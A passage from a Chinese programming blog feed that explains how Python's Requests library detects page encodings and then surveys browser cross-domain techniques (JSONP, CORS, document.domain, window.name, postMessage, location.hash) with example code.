<h4 id="简单demo"><a href="#简单demo" class="headerlink" title="简单demo"></a>简单demo</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line">r = requests.get(<span class="string">"http://www.scusec.org"</span>)</span><br><span class="line"><span class="keyword">print</span> r.encoding <span class="comment"># Requests推测使用的编码格式</span></span><br><span class="line"><span class="keyword">print</span> r.text <span class="comment"># 字符串方式的响应体,会自动根据响应头部的字符编码进行解码</span></span><br><span class="line"><span class="keyword">print</span> r.content <span class="comment"># 字节方式的响应体,会自动为你解码 gzip 和 deflate 压缩</span></span><br></pre></td></tr></table></figure>
<p>请求发出后,Requests默认会基于 HTTP 头部对响应的编码作出有根据的推测。当你使用 r.text 获取返回的内容时,Requests会使用其推测的编码格式进行解码。而当使用 r.content,则会获取原始的字节方式的响应体。</p>
<h4 id="Requests默认识别编码"><a href="#Requests默认识别编码" class="headerlink" title="Requests默认识别编码"></a>Requests默认识别编码</h4><p>在 <code>C:\Python27\Lib\site-packages\requests\utils.py</code>中,发现默认encoding的获取方式<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Try charset from content-type</span></span><br><span class="line">encoding = get_encoding_from_headers(r.headers)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_encoding_from_headers</span><span class="params">(headers)</span>:</span></span><br><span class="line"> <span class="string">"""Returns encodings from given HTTP Header Dict.</span><br><span class="line"></span><br><span class="line"> :param headers: dictionary to extract encoding from.</span><br><span class="line"> """</span></span><br><span class="line"></span><br><span class="line"> content_type = headers.get(<span class="string">'content-type'</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> <span class="keyword">not</span> content_type:</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">None</span></span><br><span class="line"></span><br><span class="line"> content_type, params = cgi.parse_header(content_type)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> <span class="string">'charset'</span> <span class="keyword">in</span> params:</span><br><span class="line"> <span class="keyword">return</span> params[<span class="string">'charset'</span>].strip(<span class="string">"'\""</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">if</span> <span class="string">'text'</span> <span class="keyword">in</span> content_type:</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'ISO-8859-1'</span></span><br></pre></td></tr></table></figure></p>
<p>在函数get_encoding_from_headers,如果返回头<code>content-type</code>发现”charset”,则返回相应的编码格式,否则返回”ISO-8859-1”。利用这种方式判断编码方式,未免有点过于简单和草率。</p>
<h4 id="Requests其他识别编码方式"><a href="#Requests其他识别编码方式" class="headerlink" title="Requests其他识别编码方式"></a>Requests其他识别编码方式</h4><p>在知道Requests的默认识别方式不靠谱后,通常我们采用的方式有</p>
<blockquote>
<ol>
<li>提取返回体中 <code>META http-equiv=Content-Type content="text/html; charset=gb2312</code>中的编码格式</li>
<li>利用chardet库识别返回体的编码格式</li>
</ol>
</blockquote>
<p>其实Requests中,已经支持这两种识别方式。见<code>utils.py</code>中:<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_encodings_from_content</span><span class="params">(content)</span>:</span></span><br><span class="line"> <span class="string">"""Returns encodings from given content string.</span><br><span class="line"></span><br><span class="line"> :param content: bytestring to extract encodings from.</span><br><span class="line"> """</span></span><br><span class="line"> warnings.warn((</span><br><span class="line"> <span class="string">'In requests 3.0, get_encodings_from_content will be removed. For '</span></span><br><span class="line"> <span class="string">'more information, please see the discussion on issue #2266. (This'</span></span><br><span class="line"> <span class="string">' warning should only appear once.)'</span>),</span><br><span class="line"> DeprecationWarning)</span><br><span class="line"></span><br><span class="line"> charset_re = re.compile(<span class="string">r'<meta.*?charset=["\']*(.+?)["\'>]'</span>, flags=re.I)</span><br><span class="line"> pragma_re = re.compile(<span class="string">r'<meta.*?content=["\']*;?charset=(.+?)["\'>]'</span>, flags=re.I)</span><br><span class="line"> xml_re = re.compile(<span class="string">r'^<\?xml.*?encoding=["\']*(.+?)["\'>]'</span>)</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> (charset_re.findall(content) +</span><br><span class="line"> pragma_re.findall(content) +</span><br><span class="line"> xml_re.findall(content))</span><br></pre></td></tr></table></figure></p>
<p>再见<code>models.py</code>,定义了apparent_encoding属性<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">@property</span></span><br><span class="line"> <span class="function"><span class="keyword">def</span> <span class="title">apparent_encoding</span><span class="params">(self)</span>:</span></span><br><span class="line"> <span class="string">"""The apparent encoding, provided by the chardet library"""</span></span><br><span class="line"> <span class="keyword">return</span> chardet.detect(self.content)[<span class="string">'encoding'</span>]</span><br></pre></td></tr></table></figure></p>
<h4 id="三种识别方式比较"><a href="#三种识别方式比较" class="headerlink" title="三种识别方式比较"></a>三种识别方式比较</h4><p>针对这三种方式,有的需要获取返回体,所以这三种识别编码的速率及需要的资源不同。先看看下面的程序:<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#! usr/bin/env python</span></span><br><span class="line"><span class="comment">#! coding: utf-8</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> time</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line">r = requests.get(<span class="string">"http://www.scusec.org"</span>)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">charset_type</span><span class="params">()</span>:</span></span><br><span class="line"> char_type = requests.utils.get_encoding_from_headers(r.headers)</span><br><span class="line"> <span class="keyword">return</span> char_type</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">charset_content</span><span class="params">()</span>:</span></span><br><span class="line"> charset_content = requests.utils.get_encodings_from_content(r.content)</span><br><span class="line"> <span class="keyword">return</span> charset_content[<span class="number">0</span>]</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">charset_det</span><span class="params">()</span>:</span></span><br><span class="line"> charset_det = r.apparent_encoding</span><br><span class="line"> <span class="keyword">return</span> charset_det</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">chose_fun</span><span class="params">(n)</span>:</span></span><br><span class="line"> <span class="keyword">if</span> n == <span class="number">1</span>:</span><br><span class="line"> <span class="keyword">return</span> charset_type</span><br><span class="line"> <span class="keyword">elif</span> n == <span class="number">2</span>:</span><br><span class="line"> <span class="keyword">return</span> charset_content</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> <span class="keyword">return</span> charset_det</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line"> <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>,<span class="number">4</span>):</span><br><span class="line"> funs = chose_fun(i)</span><br><span class="line"> start_time = time.time()</span><br><span class="line"> chars = funs()</span><br><span class="line"> end_time = time.time()</span><br><span class="line"> times = end_time - start_time</span><br><span class="line"> <span class="keyword">print</span> chars+<span class="string">" "</span>+str(times)</span><br></pre></td></tr></table></figure></p>
<p>返回结果<br><img src="https://img.alicdn.com/imgextra/i2/792076116/TB23LWhbo5O.eBjSZFxXXaaJFXa_!!792076116.png" alt=""><br>可见在速率上<code>charset_type > charset_content > charset_det</code>,并且<code>charset_type</code>在空间使用上也是最优的。</p>
<h4 id="综合的解决方法"><a href="#综合的解决方法" class="headerlink" title="综合的解决方法"></a>综合的解决方法</h4><p>综合上面的几种解决方式,可以定义一个解决函数:<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">charsets</span><span class="params">(res)</span>:</span></span><br><span class="line"> _charset = requests.utils.get_encoding_from_headers(res.headers)</span><br><span class="line"> <span class="keyword">if</span> _charset == <span class="string">'ISO-8859-1'</span>:</span><br><span class="line"> __charset = requests.utils.get_encodings_from_content(res.content)[<span class="number">0</span>]</span><br><span class="line"> <span class="keyword">if</span> __charset:</span><br><span class="line"> _charset = __charset</span><br><span class="line"> <span class="keyword">else</span>:</span><br><span class="line"> _charset = res.apparent_encoding</span><br><span class="line"> <span class="keyword">return</span> _charset</span><br></pre></td></tr></table></figure></p>
<p>那么处理中文网页:</p>
<ol>
<li>利用<code>charsets</code>函数获取页面编码方式,再配合<code>r.content</code>进行相关的解码和编码</li>
<li>利用<code>charsets</code>函数获取页面编码方式,设定<code>r.encoding</code>的值,再获取<code>r.text</code></li>
</ol>
]]></content>
<summary type="html">
<p>Requests是用Python语言编写,使用的是urllib3,拥有了它的所有特性,Requests 支持 HTTP 连接保持和连接池,支持使用 cookie 保持会话,支持文件上传,支持自动确定响应内容的编码,支持国际化的 URL 和 POST 数据自动编码。现代、国际化、人性化。正是由于它的强大,所以现在被广泛的用于爬虫等方面,但是在对中文网页进行抓取的时候,或多或少会遇到一些编码问题,本文就这些问题讨论一下。
</summary>
<category term="编程之美" scheme="http://wps2015.org/categories/%E7%BC%96%E7%A8%8B%E4%B9%8B%E7%BE%8E/"/>
<category term="python" scheme="http://wps2015.org/tags/python/"/>
</entry>
<entry>
<title>跨域方法总结</title>
<link href="http://wps2015.org/2016/10/17/summary-of-cross-domain/"/>
<id>http://wps2015.org/2016/10/17/summary-of-cross-domain/</id>
<published>2016-10-16T16:00:00.000Z</published>
<updated>2017-03-22T01:27:33.276Z</updated>
<content type="html"><![CDATA[<p>最近面试问的挺多的一个问题,就是JavaScript的跨域问题。在这里,对跨域的一些方法做个总结。由于浏览器的同源策略,不同域名、不同端口、不同协议都会构成跨域;但在实际的业务中,很多场景需要进行跨域传递信息,这样就催生出多种跨域方法。<br><a id="more"></a></p>
<h3 id="1-具备src的标签"><a href="#1-具备src的标签" class="headerlink" title="1. 具备src的标签"></a>1. 具备src的标签</h3><ul>
<li>原理:所有具有<code>src</code>属性的HTML标签都是可以跨域的</li>
</ul>
<p>在浏览器中,<code><script></code>、<code><img></code>、<code><iframe></code>和<code><link></code>这几个标签是可以加载跨域(非同源)的资源的,并且加载的方式其实相当于一次普通的GET请求,唯一不同的是,为了安全起见,浏览器不允许这种方式下对加载到的资源的读写操作,而只能使用标签本身应当具备的能力(比如脚本执行、样式应用等等)。</p>
<h3 id="2-JSONP跨域"><a href="#2-JSONP跨域" class="headerlink" title="2. JSONP跨域"></a>2. JSONP跨域</h3><ul>
<li>原理:<code><script></code>是可以跨域的,而且在跨域脚本中可以直接回调当前脚本的函数</li>
</ul>
<p>script标签是可以加载异域的JavaScript并执行的,通过预先设定好的callback函数来实现和母页面的交互。它有一个大名,叫做JSONP跨域,JSONP是JSON with Padding的略称。它是一个非官方的协议,明明是加载script,为啥和JSON扯上关系呢?原来就是这个callback函数,对它的使用有一个典型的方式,就是通过JSON来传参,即将JSON数据填充进回调函数,这就是JSONP的JSON+Padding的含义。JSONP只支持GET请求。<br>前端代码:<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">script</span> <span class="attr">type</span>=<span class="string">"text/javascript"</span>></span><span class="javascript"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">dosomething</span>(<span class="params">jsondata</span>)</span>{</span><br><span class="line"> <span class="comment">//处理获得的json数据</span></span><br><span class="line"> }</span><br><span class="line"></span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span> <span class="attr">src</span>=<span class="string">"http://haorooms.com/data.php?callback=dosomething"</span>></span><span class="undefined"></span><span class="tag"></<span class="name">script</span>></span></span><br></pre></td></tr></table></figure></p>
<p>后台代码:<br><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">$callback = $_GET[<span class="string">'callback'</span>];<span class="comment">//得到回调函数名</span></span><br><span class="line">$data = <span class="keyword">array</span>(<span class="string">'a'</span>,<span class="string">'b'</span>,<span class="string">'c'</span>);<span class="comment">//要返回的数据</span></span><br><span class="line"><span class="keyword">echo</span> $callback.<span class="string">'('</span>.json_encode($data).<span class="string">')'</span>;<span class="comment">//输出</span></span><br><span class="line"><span class="meta">?></span></span><br></pre></td></tr></table></figure></p>
<h3 id="3-跨域资源共享(CORS)"><a href="#3-跨域资源共享(CORS)" class="headerlink" title="3. 跨域资源共享(CORS)"></a>3. 跨域资源共享(CORS)</h3><ul>
<li>原理:服务器设置Access-Control-Allow-Origin HTTP响应头之后,浏览器将会允许跨域请求</li>
</ul>
<p>CORS是HTML5标准提出的跨域资源共享(Cross Origin Resource Share),支持GET、POST等所有HTTP请求。CORS需要服务器端设置<code>Access-Control-Allow-Origin</code>头,否则浏览器会因为安全策略拦截返回的信息。<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">Access-Control-Allow-Origin: * # 允许所有域名访问,或者</span><br><span class="line">Access-Control-Allow-Origin: http://a.com # 只允许所有域名访问</span><br></pre></td></tr></table></figure></p>
<p>CORS又分为简单跨域和非简单跨域请求,有关CORS的详细介绍请看<code>阮一峰</code>的<a href="http://www.ruanyifeng.com/blog/2016/04/cors.html" target="_blank" rel="external">跨域资源共享 CORS 详解</a>,里面讲解的非常详细。</p>
<h3 id="4-document-domain"><a href="#4-document-domain" class="headerlink" title="4. document.domain"></a>4. document.domain</h3><ul>
<li>原理:相同主域名不同子域名下的页面,可以设置document.domain让它们同域</li>
</ul>
<p>我们只需要在跨域的两个页面中设置document.domain就可以了。修改document.domain的方法只适用于不同子域的框架间的交互,要载入iframe页面。<br>例如:1. 在页面 <a href="http://a.example.com/a.html" target="_blank" rel="external">http://a.example.com/a.html</a> 设置document.domain<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">iframe</span> <span class="attr">id</span> = <span class="string">"iframe"</span> <span class="attr">src</span>=<span class="string">"http://b.example.com/b.html"</span> <span class="attr">onload</span> = <span class="string">"test()"</span>></span><span class="tag"></<span class="name">iframe</span>></span></span><br><span class="line"><span class="tag"><<span class="name">script</span> <span class="attr">type</span>=<span class="string">"text/javascript"</span>></span><span class="javascript"></span><br><span class="line"> <span class="built_in">document</span>.domain = <span class="string">'example.com'</span>;<span class="comment">//设置成主域</span></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">test</span>(<span class="params"></span>)</span>{</span><br><span class="line"> alert(<span class="built_in">document</span>.getElementById(<span class="string">'iframe'</span>).contentWindow);<span class="comment">//contentWindow 可取得子窗口的 window 对象</span></span><br><span class="line"> }</span><br><span class="line"></span><span class="tag"></<span class="name">script</span>></span></span><br></pre></td></tr></table></figure></p>
<p>2、在页面http:// b.example.com/b.html 中设置document.domain<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">script</span> <span class="attr">type</span>=<span class="string">"text/javascript"</span>></span><span class="javascript"></span><br><span class="line"> <span class="built_in">document</span>.domain = <span class="string">'example.com'</span>;<span class="comment">//在iframe载入这个页面也设置document.domain,使之与主页面的document.domain相同</span></span><br><span class="line"></span><span class="tag"></<span class="name">script</span>></span></span><br></pre></td></tr></table></figure></p>
<h3 id="5-window-name"><a href="#5-window-name" class="headerlink" title="5. window.name"></a>5. window.name</h3><ul>
<li>原理:window对象有个name属性,该属性有个特征:即在一个窗口(window)的生命周期内,窗口载入的所有的页面都是共享一个window.name的,每个页面对window.name都有读写的权限,window.name是持久存在一个窗口载入过的所有页面中的。</li>
</ul>
<p>这里有三个页面:</p>
<ul>
<li>sever.com/a.html 数据存放页面</li>
<li>agent.com/b.html 数据获取页面</li>
<li>agent.com/c.html 空页面,做代理使用</li>
</ul>
<p>a.html中,设定<code>window.name</code>作为需要传递的值<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="javascript"></span><br><span class="line"> <span class="built_in">window</span>.name = <span class="string">'I was there!'</span>;</span><br><span class="line"> alert(<span class="built_in">window</span>.name);</span><br><span class="line"></span><span class="tag"></<span class="name">script</span>></span></span><br></pre></td></tr></table></figure></p>
<p>b.html中,当iframe加载后将iframe的<code>src</code>指向同域的<code>c.html</code>,这样就可以利用<code>iframe.contentWindow.name</code>获取要传递的值了<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">body</span>></span></span><br><span class="line"> <span class="tag"><<span class="name">script</span> <span class="attr">type</span>=<span class="string">"text/javascript"</span>></span><span class="javascript"></span><br><span class="line"> iframe = <span class="built_in">document</span>.createElement(<span class="string">'iframe'</span>);</span><br><span class="line"> iframe.style.display = <span class="string">'none'</span>;</span><br><span class="line"> <span class="keyword">var</span> state = <span class="number">0</span>;</span><br><span class="line"> iframe.onload = <span class="function"><span class="keyword">function</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">if</span>(state === <span class="number">1</span>) {</span><br><span class="line"> <span class="keyword">var</span> data = <span class="built_in">JSON</span>.parse(iframe.contentWindow.name);</span><br><span class="line"> alert(data);</span><br><span class="line"> iframe.contentWindow.document.write(<span class="string">''</span>);</span><br><span class="line"> iframe.contentWindow.close();</span><br><span class="line"> <span class="built_in">document</span>.body.removeChild(iframe);</span><br><span class="line"> } <span class="keyword">else</span> <span class="keyword">if</span>(state === <span class="number">0</span>) {</span><br><span class="line"> state = <span class="number">1</span>;</span><br><span class="line"> iframe.contentWindow.location = <span class="string">'http://agent.com/c.html'</span>;</span><br><span class="line"> }</span><br><span class="line"> };</span><br><span class="line"> iframe.src = <span class="string">'http://sever.com/a.html'</span>;</span><br><span class="line"> <span class="built_in">document</span>.body.appendChild(iframe);</span><br><span class="line"> </span><span class="tag"></<span class="name">script</span>></span></span><br><span class="line"><span class="tag"></<span class="name">body</span>></span></span><br></pre></td></tr></table></figure></p>
<p>成功获取跨域数据,效果如下:<br><img src="https://img.alicdn.com/imgextra/i3/792076116/TB2HXEBXk1M.eBjSZFOXXc0rFXa_!!792076116.png" alt=""></p>
<h3 id="6-window-postMesage"><a href="#6-window-postMesage" class="headerlink" title="6. window.postMesage"></a>6. window.postMesage</h3><ul>
<li>原理: HTML5新增的postMessage方法,通过postMessage来传递信息,对方可以通过监听message事件来监听信息。可跨主域名及双向跨域。</li>
</ul>
<p>这里有两个页面:</p>
<ol>
<li>agent.com/index.html</li>
<li>server.com/remote.html</li>
</ol>
<p>本地代码index.html<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">body</span>></span> </span><br><span class="line"> <span class="tag"><<span class="name">iframe</span> <span class="attr">id</span>=<span class="string">"proxy"</span> <span class="attr">src</span>=<span class="string">"http://server.com/remote.html"</span> <span class="attr">onload</span> = <span class="string">"postMsg()"</span> <span class="attr">style</span>=<span class="string">"display: none"</span> ></span><span class="tag"></<span class="name">iframe</span>></span> </span><br><span class="line"> <span class="tag"><<span class="name">script</span> <span class="attr">type</span>=<span class="string">"text/javascript"</span>></span><span class="javascript"> </span><br><span class="line"> <span class="keyword">var</span> obj = { </span><br><span class="line"> msg: <span class="string">'hello world'</span> </span><br><span class="line"> } </span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">postMsg</span> (<span class="params"></span>)</span>{ </span><br><span class="line"> <span class="keyword">var</span> iframe = <span class="built_in">document</span>.getElementById(<span class="string">'proxy'</span>); </span><br><span class="line"> <span class="keyword">var</span> win = iframe.contentWindow; </span><br><span class="line"> win.postMessage(obj,<span class="string">'http://server.com'</span>); </span><br><span class="line"> } </span><br><span class="line"> </span><span class="tag"></<span class="name">script</span>></span> </span><br><span class="line"><span class="tag"></<span class="name">body</span>></span></span><br></pre></td></tr></table></figure></p>
<p><code>postMessage</code>的使用方法: otherWindow.postMessage(message, targetOrigin);</p>
<ul>
<li>otherWindow: 指目标窗口,也就是给哪个window发消息,是 window.frames 属性的成员或者由 window.open 方法创建的窗口</li>
<li>message: 是要发送的消息,类型为 String、Object (IE8、9 不支持)</li>
<li>targetOrigin: 是限定消息接收范围,不限制请使用 ‘*’</li>
</ul>
<p>server.com上remote.html,监听<code>message</code>事件,并检查来源是否是要通信的域。<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><head></span><br><span class="line"> <title></title></span><br><span class="line"> <script type="text/javascript"></span><br><span class="line"> window.onmessage = function(e){</span><br><span class="line"> if(e.origin !== 'http://localhost:8088') return;</span><br><span class="line"> alert(e.data.msg+" from "+e.origin);</span><br><span class="line"> }</span><br><span class="line"> </script></span><br><span class="line"></head></span><br></pre></td></tr></table></figure></p>
<p><img src="https://img.alicdn.com/imgextra/i3/792076116/TB2nrneXCmK.eBjSZPfXXce2pXa_!!792076116.png" alt=""></p>
<h3 id="7-location-hash"><a href="#7-location-hash" class="headerlink" title="7. location.hash"></a>7. location.hash</h3><p>原理:</p>
<ul>
<li>这个办法比较绕,但是可以解决完全跨域情况下的脚步置换问题。原理是利用location.hash来进行传值。www.a.com下的a.html想和www.b.com下的b.html通信(在a.html中动态创建一个b.html的iframe来发送请求)</li>
<li>但是由于“同源策略”的限制他们无法进行交流(b.html无法返回数据),于是就找个中间人:www.a.com下的c.html(注意是www.a.com下的)。</li>
<li>b.html将数据传给c.html(b.html中创建c.html的iframe),由于c.html和a.html同源,于是可通过c.html将返回的数据传回给a.html,从而达到跨域的效果。</li>
</ul>
<p><img src="https://img.alicdn.com/imgextra/i4/792076116/TB23US2XM1J.eBjy0FaXXaXeVXa_!!792076116.jpg" alt=""><br>a.html代码如下:<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="javascript"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">startRequest</span>(<span class="params"></span>)</span>{ </span><br><span class="line"> <span class="keyword">var</span> ifr = <span class="built_in">document</span>.createElement(<span class="string">'iframe'</span>); </span><br><span class="line"> ifr.style.display = <span class="string">'none'</span>; </span><br><span class="line"> ifr.src = <span class="string">'http://www.b.com/b.html#sayHi'</span>; <span class="comment">//传递的location.hash </span></span><br><span class="line"> <span class="built_in">document</span>.body.appendChild(ifr); </span><br><span class="line">} </span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">checkHash</span>(<span class="params"></span>) </span>{ </span><br><span class="line"> <span class="keyword">try</span> { </span><br><span class="line"> <span class="keyword">var</span> data = location.hash ? location.hash.substring(<span class="number">1</span>) : <span class="string">''</span>; </span><br><span class="line"> <span class="keyword">if</span> (<span class="built_in">console</span>.log) { </span><br><span class="line"> <span class="built_in">console</span>.log(<span class="string">'Now the data is '</span>+data); </span><br><span class="line"> } </span><br><span class="line"> } <span class="keyword">catch</span>(e) {}; </span><br><span class="line">} </span><br><span class="line">setInterval(checkHash, <span class="number">2000</span>); </span><br><span class="line"><span class="built_in">window</span>.onload = startRequest;</span><br><span class="line"></span><span class="tag"></<span class="name">script</span>></span></span><br></pre></td></tr></table></figure></p>
<p>b.html代码如下:<br><figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag"><<span class="name">script</span>></span><span class="javascript"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">checkHash</span>(<span class="params"></span>)</span>{</span><br><span class="line"> <span class="keyword">var</span> data = <span class="string">''</span>;</span><br><span class="line"> <span class="comment">//模拟一个简单的参数处理操作</span></span><br><span class="line"> <span class="keyword">switch</span>(location.hash){</span><br><span class="line"> <span class="keyword">case</span> <span class="string">'#sayHello'</span>: data = <span class="string">'HelloWorld'</span>;<span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">case</span> <span class="string">'#sayHi'</span>: data = <span class="string">'HiWorld'</span>;<span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">default</span>: <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"> data && callBack(<span class="string">'#'</span>+data);</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">callBack</span>(<span class="params">hash</span>)</span>{</span><br><span class="line"> <span class="comment">// ie、chrome的安全机制无法修改parent.location.hash,所以要利用一个中间的www.a.com域下的代理iframe</span></span><br><span class="line"> <span class="keyword">var</span> proxy = <span class="built_in">document</span>.createElement(<span class="string">'iframe'</span>);</span><br><span class="line"> proxy.style.display = <span class="string">'none'</span>;</span><br><span class="line"> proxy.src = <span class="string">'http://localhost:8088/proxy.html'</span>+hash; <span class="comment">// 注意该文件在"www.a.com"域下</span></span><br><span class="line"> <span class="built_in">document</span>.body.appendChild(proxy);</span><br><span class="line">}</span><br><span class="line"><span class="built_in">window</span>.onload = checkHash;</span><br><span class="line"></span><span class="tag"></<span class="name">script</span>></span></span><br></pre></td></tr></table></figure></p>
